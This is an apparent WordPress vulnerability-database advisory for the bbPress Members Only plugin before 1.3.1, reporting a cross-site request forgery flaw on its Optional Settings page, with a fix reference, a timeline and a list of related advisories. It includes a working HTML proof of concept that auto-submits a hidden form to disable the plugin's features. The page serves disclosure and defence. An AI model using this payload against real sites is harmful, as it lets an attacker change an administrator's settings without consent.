bbPress Members Only < 1.3.1 – CSRF on Optional Settings page | Plugin Vulnerabilities

Description

The plugin does not prevent Cross-Site Request Forgery attacks on its 'Optional Settings' page.

Proof of Concept

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://127.0.0.1/wp-admin/admin.php?page=bpmemberoptionalsettings" method="POST">
      <input type="hidden" name="bbpdisableallfeature" value="yes" />
      <input type="hidden" name="bbpoptionsettinspanelsubmit" value="&#32;Submit&#32;" />
    </form>
  </body>
</html>

Affects Plugins

bbp-members-only

Fixed in 1.3.1

References

URL

https://plugins.trac.wordpress.org/changeset/2217984

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Verified

Yes

WPVDB ID

cf473f2a-cd1d-486d-a91b-40d9dc16c103

Timeline

Publicly Published

2019-12-26 (about 6 years ago)

Added

2019-12-26 (about 6 years ago)

Last Updated

2019-12-26 (about 6 years ago)

Other

Published

Title

Published

2023-07-05

Title

ShopLentor < 2.6.3 - Settings Update via CSRF

Published

2025-04-17

Title

Dashboard Notepads <= 1.2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-07-17

Title

Recipe Maker For Your Food Blog from Zip Recipes < 8.0.8 - Cross-Site Request Forgery

Published

2015-03-10

Title

Fraction Theme < 1.1.2 - Privilege Escalation

Published

2025-02-17

Title

Option Editor <= 1.0 - Cross-Site Request Forgery to Arbitrary Options Update